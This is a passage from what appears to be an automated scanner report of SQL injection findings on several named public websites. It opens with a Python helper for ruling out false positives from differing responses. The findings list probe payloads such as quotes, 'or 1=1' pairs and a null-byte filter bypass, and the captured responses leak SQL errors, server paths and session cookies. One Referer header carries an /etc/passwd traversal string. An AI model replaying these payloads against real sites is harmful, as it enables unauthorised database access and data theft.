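# dynamic body tokens in the constructed samples; a real page needs more rules.
VOLATILE_BODY = [
    (re.compile(r'IG:"[0-9a-f]{32}"'), 'IG:"<id>"'),
    (re.compile(r'EventID:"[0-9A-F]{32}"'), 'EventID:"<id>"'),
]


def split_response(raw):
    """Split a raw HTTP response into (status line, [(name, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers, body


def normalise(raw):
    """Drop volatile headers and mask per-request body tokens."""
    status, headers, body = split_response(raw)
    kept = sorted(f"{n}: {v}" for n, v in headers if n not in VOLATILE_HEADERS)
    for pattern, replacement in VOLATILE_BODY:
        body = pattern.sub(replacement, body)
    return status + "\n" + "\n".join(kept) + "\n\n" + body


def compare(resp_true, resp_false):
    """Compare the 1=1 and 1=2 responses.

    Returns (differs_raw, differs_normalised, diff_lines). A pair that differs
    raw but not normalised is the false-positive pattern the report warns about;
    a pair that still differs after normalisation deserves manual follow-up.
    """
    a, b = normalise(resp_true), normalise(resp_false)
    diff = list(unified_diff(a.splitlines(), b.splitlines(), "1=1", "1=2",
                             lineterm="", n=0))
    return resp_true != resp_false, a != b, diff


def sample_response(trace_id, ig, event_id, results=""):
    """Constructed response in the shape of the 1.2 pair; not a real capture."""
    body = (
        "<html><script>"
        f'_G={{Mkt:"en-US",IG:"{ig}",EventID:"{event_id}",P:"local"}};'
        '</script><body><div id="results">' + results + "</div></body></html>"
    )
    return (
        "HTTP/1.1 200 OK\r\n"
        "Cache-Control: private\r\n"
        "Content-Type: text/html; charset=utf-8\r\n"
        f"X-BM-TraceID: {trace_id}\r\n"
        "X-AspNet-Version: 2.0.50727\r\n"
        f"Set-Cookie: BID={trace_id}; path=/local\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n" + body
    )


if __name__ == "__main__":
    # Identifier values taken from the two responses in this finding.
    first = sample_response("6c1547c0da0f4e5597e01caf67ef9a1f",
                            "152f82724007427dbb0aa7f8698534b7",
                            "6C1547C0DA0F4E5597E01CAF67EF9A1F")
    second = sample_response("330306a394a243af8e4e4708336e90bf",
                             "cb31e2517e3249c199bc1fb6209d5260",
                             "330306A394A243AF8E4E4708336E90BF")
    differs_raw, differs_norm, diff = compare(first, second)
    print("raw differs:", differs_raw, "after normalisation:", differs_norm)
    print("\n".join(diff))
```

Feed compare the two captured bodies as strings; if the remaining diff is empty, re-test with payloads that would change the result set in a way a per-request token cannot imitate (for instance a condition on a column the page actually displays) before keeping the finding at High.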

Request 1

GET /local/details.aspx?lid=YN786x143652687&qt=yp&what=8034286771&where=Washington%2c+District+of+Columbia&s_cid=ansPhBkYp02&mkt=en-us&q=8034286771&FORM=LARE HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=8034286771&go=&form=QBRE&qs=n&sk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689'%20and%201%3d1--%20; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; SRCHD=MS=1655311&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _FP=BDCE=129432394472338527&BDCEH=8D8DA4372A34906CD86E2A002A63F9CC; _HOP=; RMS=F=O&A=SAAAAAAAAQ; _SS=SID=641CB7A32570469C873045A16513C459&CW=1437&bIm=556&hIm=100

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 26 Feb 2011 02:21:38 GMT
Last-Modified: Sat, 26 Feb 2011 00:21:38 GMT
X-BM-TraceID: 6c1547c0da0f4e5597e01caf67ef9a1f
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001210
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:21:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BID=5553272bdb174b40a3bb4c7a64a8916e; path=/local
Set-Cookie: CID=03e21cf236904861b0798bbcba22dfa1; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: CDate=2/26/2011 12:21:38 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Content-Length: 282556


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns = "http://www.w3.org/1999/xhtml" xmlns:web = "http://schema
...[SNIP]...
<![CDATA[
_G={ST:(si_ST?si_ST:new Date),Mkt:"en-US",RTL:false,Ver:"7_01_0_836281",IG:"152f82724007427dbb0aa7f8698534b7",EventID:"6C1547C0DA0F4E5597E01CAF67EF9A1F",P:"local",DA:"Bl2",SUIH:"gQVAkYKqHJOzp6-QDpl3dw",gpUrl:"\/fd\/ls\/GLinkPing.aspx?"};_G.lsUrl="/fd/ls/l?IG="+_G.IG;curUrl="http:\/\/www.bing.com\/local\/details.aspx";function si_T(a){if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+'IG='+_G.IG+a;}return true;};_w=window;_d=document;sb_de=_d.documentElement;sb_ie=!!_w.ActiveXObject;sb_i6=sb_ie&&!_w.XMLHttpRequest;function _ge(a){return _d.getElementById(a)}sb_st=_w.setTimeout;sb_ct=_w.clearTimeout;sb_gt=function(){return(new Date).getTime()};function si_PP(e,c){if(!_G.PPS){for(var d='"',b=["PC","FC","BC","BS","H","C1","C2","BP","KP"],a=0;a<b.length;a++)d+=',"'+b[a]+'":'+(_G[b[a]+"T"]?_G[b[a]+"T"]-_G.ST:-1);_G.PPImg=new Image;_G.PPImg.src=_G.lsUrl+'&Type=Event.CPT&DATA={"pp":{"S":"'+(c?c:"L")+d+',"CT":'+(e-_G.ST)+',"IL":'+_d.images.length+(_w.sb_ppCPL?',"CP":1':"")+"}}"+(_G.P?"&P="+_G.P:"")+(_G.DA?"&DA="+_G.DA:"");_G.PPS=1;sb_st(function(){sj_evt.fire("onPP")},1)}}_w.onbeforeunload=function(){si_PP(new Date,"A")};sj_evt=new function(){var a={},b=this;function c(b){return a[b]||(a[b]=[])}b.fire=function(e){for(var a=c(e),d=a.e=arguments,b=0;b<a.length;b++)if(a[b].d)sb_st(sj_wf(a[b],d),a[b].d);else a[b](d)};b.bind=function(f,a,d,e){var b=c(f);a.d=e;b.push(a);d&&b.e&&a(b.e)};b.unbind=function(e,d){for(var c=0,b=a[e];b&&c<b.length;c++)if(b[c]==d){b.splice(c,1);break}}};
//]]></script><link rel="stylesheet" href="/fd/sa/0113225403/brand4_c.css" type="text/css"/><style type="text/css">#sw_im{filter: ;opacity:1;background-image:url(/fd/hpk2/Numbat_EN-US1348429100o.jpg)}</style><script type="text/javascript" src="/fd/sa/1124061903/Shared.js"></script><script type="text/javascript">//<![CDATA[
Log=new function(){var f=this,a=escape,h="length",g="indexOf",i="apply",j=2e3,e=a("["),d=0,k=0,c,l="",m=_G.lsUrl+"&TYPE=Event.ClientInst&DATA=",n=location.hostname.match(/([^.]+\.[^.]*)$/);if(n)l="http://a4."+n[0];f.ping=new Image;f.Log=function(d,e,
...[SNIP]...

Request 2

GET /local/details.aspx?lid=YN786x143652687&qt=yp&what=8034286771&where=Washington%2c+District+of+Columbia&s_cid=ansPhBkYp02&mkt=en-us&q=8034286771&FORM=LARE HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/search?q=8034286771&go=&form=QBRE&qs=n&sk=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=F7578C9AAF894F8C831EB5E336C5B689'%20and%201%3d2--%20; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110215; _UR=OMW=1; SRCHD=MS=1655311&SM=1&D=1644428&AF=NOFORM; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; _FP=BDCE=129432394472338527&BDCEH=8D8DA4372A34906CD86E2A002A63F9CC; _HOP=; RMS=F=O&A=SAAAAAAAAQ; _SS=SID=641CB7A32570469C873045A16513C459&CW=1437&bIm=556&hIm=100

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 26 Feb 2011 02:21:39 GMT
Last-Modified: Sat, 26 Feb 2011 00:21:39 GMT
X-BM-TraceID: 330306a394a243af8e4e4708336e90bf
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001209
Vary: Accept-Encoding
Date: Sat, 26 Feb 2011 00:21:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BID=d9205741bfd74ee0a583a9861832d384; path=/local
Set-Cookie: CID=4b7e5696088d40a09afe6db564f0bffb; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: CDate=2/26/2011 12:21:38 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Content-Length: 282568


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns = "http://www.w3.org/1999/xhtml" xmlns:web = "http://schema
...[SNIP]...
<![CDATA[
_G={ST:(si_ST?si_ST:new Date),Mkt:"en-US",RTL:false,Ver:"7_01_0_836281",IG:"cb31e2517e3249c199bc1fb6209d5260",EventID:"330306A394A243AF8E4E4708336E90BF",P:"local",DA:"Bl2",SUIH:"gQVAkYKqHJOzp6-QDpl3dw",gpUrl:"\/fd\/ls\/GLinkPing.aspx?"};_G.lsUrl="/fd/ls/l?IG="+_G.IG;curUrl="http:\/\/www.bing.com\/local\/details.aspx";function si_T(a){if(document.images){_G.GPImg=new Image;_G.GPImg.src=_G.gpUrl+'IG='+_G.IG+a;}return true;};_w=window;_d=document;sb_de=_d.documentElement;sb_ie=!!_w.ActiveXObject;sb_i6=sb_ie&&!_w.XMLHttpRequest;function _ge(a){return _d.getElementById(a)}sb_st=_w.setTimeout;sb_ct=_w.clearTimeout;sb_gt=function(){return(new Date).getTime()};function si_PP(e,c){if(!_G.PPS){for(var d='"',b=["PC","FC","BC","BS","H","C1","C2","BP","KP"],a=0;a<b.length;a++)d+=',"'+b[a]+'":'+(_G[b[a]+"T"]?_G[b[a]+"T"]-_G.ST:-1);_G.PPImg=new Image;_G.PPImg.src=_G.lsUrl+'&Type=Event.CPT&DATA={"pp":{"S":"'+(c?c:"L")+d+',"CT":'+(e-_G.ST)+',"IL":'+_d.images.length+(_w.sb_ppCPL?',"CP":1':"")+"}}"+(_G.P?"&P="+_G.P:"")+(_G.DA?"&DA="+_G.DA:"");_G.PPS=1;sb_st(function(){sj_evt.fire("onPP")},1)}}_w.onbeforeunload=function(){si_PP(new Date,"A")};sj_evt=new function(){var a={},b=this;function c(b){return a[b]||(a[b]=[])}b.fire=function(e){for(var a=c(e),d=a.e=arguments,b=0;b<a.length;b++)if(a[b].d)sb_st(sj_wf(a[b],d),a[b].d);else a[b](d)};b.bind=function(f,a,d,e){var b=c(f);a.d=e;b.push(a);d&&b.e&&a(b.e)};b.unbind=function(e,d){for(var c=0,b=a[e];b&&c<b.length;c++)if(b[c]==d){b.splice(c,1);break}}};
//]]></script><link rel="stylesheet" href="/fd/sa/0113225403/brand4_c.css" type="text/css"/><style type="text/css">#sw_im{filter: ;opacity:1;background-image:url(/fd/hpk2/Numbat_EN-US1348429100o.jpg)}</style><script type="text/javascript" src="/fd/sa/1124061903/Shared.js"></script><script type="text/javascript">//<![CDATA[
Log=new function(){var f=this,a=escape,h="length",g="indexOf",i="apply",j=2e3,e=a("["),d=0,k=0,c,l="",m=_G.lsUrl+"&TYPE=Event.ClientInst&DATA=",n=location.hostname.match(/([^.]+\.[^.]*)$/);if(n)l="http://a4."+n[0];f.ping=new Image;f.Log=function(d,e,
...[SNIP]...

1.3. http://www.bizfind.us/cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bizfind.us
Path:   /cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 1668
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Wed, 20 Apr 2011 01:02:13 GMT


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>NETSPARKER3FCA331E008F470991BCA348524BAFEB' popular categories
...[SNIP]...

Request 2

GET /cat/48/1/40836/Netsparker3fca331e008f470991bca348524bafeb.aspx'' HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 78135
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Date: Wed, 20 Apr 2011 01:02:15 GMT


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>NETSPARKER3FCA331E008F470991BCA348524BAFEB'' popular categorie
...[SNIP]...

1.4. http://www.caribbean-ocean.com/get-image.php [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /get-image.php?id=52652' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:17:55 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 934
Content-Type: image/jpg

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL
...[SNIP]...
</textarea>
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15

Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima
...[SNIP]...

1.5. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /get-image.php?id=5/1'2652 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.caribbean-ocean.com

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:19:12 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 940
Content-Type: image/jpg

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'2652' at line 1<br /><br /><textarea rows="10" cols="100"
...[SNIP]...
</textarea>
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15

Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima
...[SNIP]...

1.6. http://www.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 88463222%20or%201%3d1--%20 and 88463222%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=188463222%20or%201%3d1--%20 HTTP/1.1
Host: www.glam.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs../../../../../../../../etc/passwdviewAdJs&affiliateId=0&adSize=300x85
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; PHPSESSID=mi664gpt9tqqr7tr4l2q1o0pe1; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Wed, 20 Apr 2011 18:23:47 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 20591
X-Varnish: 303269691
Expires: Thu, 21 Apr 2011 01:23:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:23:51 GMT
Connection: close

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' style='color:white' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' style='color:white' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();'>Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator 
sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://skinbody.glam.com/' title='Skin &amp;
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=188463222%20or%201%3d2--%20 HTTP/1.1
Host: www.glam.com
Proxy-Connection: keep-alive
Referer: http://www.glam.com/app/site/affiliate/viewChannelModule.act?mName=viewAdJs../../../../../../../../etc/passwdviewAdJs&affiliateId=0&adSize=300x85
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; PHPSESSID=mi664gpt9tqqr7tr4l2q1o0pe1; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Thu, 21 Apr 2011 01:23:52 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 1968
X-Varnish: 303269764
Expires: Thu, 21 Apr 2011 01:23:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:23:52 GMT
Connection: close

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' target='_blank'><div class='_glam_search_twitter'></div></a> <a href='http://www.facebook.com/pages/Glamcom/144180538945796?ref=ts' target='_blank'><div class='_glam_search_facebook'></div></a> <a href='http://fashion.glam.com/feed/' target='_blank'><div class='_glam_search_rss'></div></a> </ul> </div> </div><div class='homehorizontalBorder'></div>";

document.write(string)

1.7. http://www.insideup.com/wiki/index.php [action parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /wiki/index.php

Issue detail

The action parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the action parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wiki/index.php?title=-&action=raw'&gen=js&useskin=monobook HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.insideup.com
Cookie: OAID=5970e1167121a2363c810f601c8e5f51; PHPSESSID=7o85u69j279gjuu7r5rl5e0lu6

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:45:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-language: en
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20028

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
...[SNIP]...
           FROM category cat, sub_category subcat
                                   WHERE cat.category_id = subcat.category_id
                                   AND LOWER(subcat.sub_category_name) = 'index.php?title=-&action=raw'&gen=js&useskin=monobook' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 5

1.8. http://www.insideup.com/wiki/index.php [title parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /wiki/index.php

Issue detail

The title parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the title parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/index.php?title=MediaWiki:Monobook.css%00'&usemsgcache=yes&action=raw&ctype=text/css&smaxage=18000 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.insideup.com
Cookie: OAID=5970e1167121a2363c810f601c8e5f51; PHPSESSID=7o85u69j279gjuu7r5rl5e0lu6

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:44:07 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-language: en
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
...[SNIP]...
                               WHERE cat.category_id = subcat.category_id
                                   AND LOWER(subcat.sub_category_name) = 'index.php?title=mediawiki:monobook.css%00'&usemsgcache=yes&action=raw&ctype=text/css&smaxage=18000' You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 5

1.9. http://www.komonews.com/obits/ [chid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.komonews.com
Path:   /obits/

Issue detail

The chid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the chid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

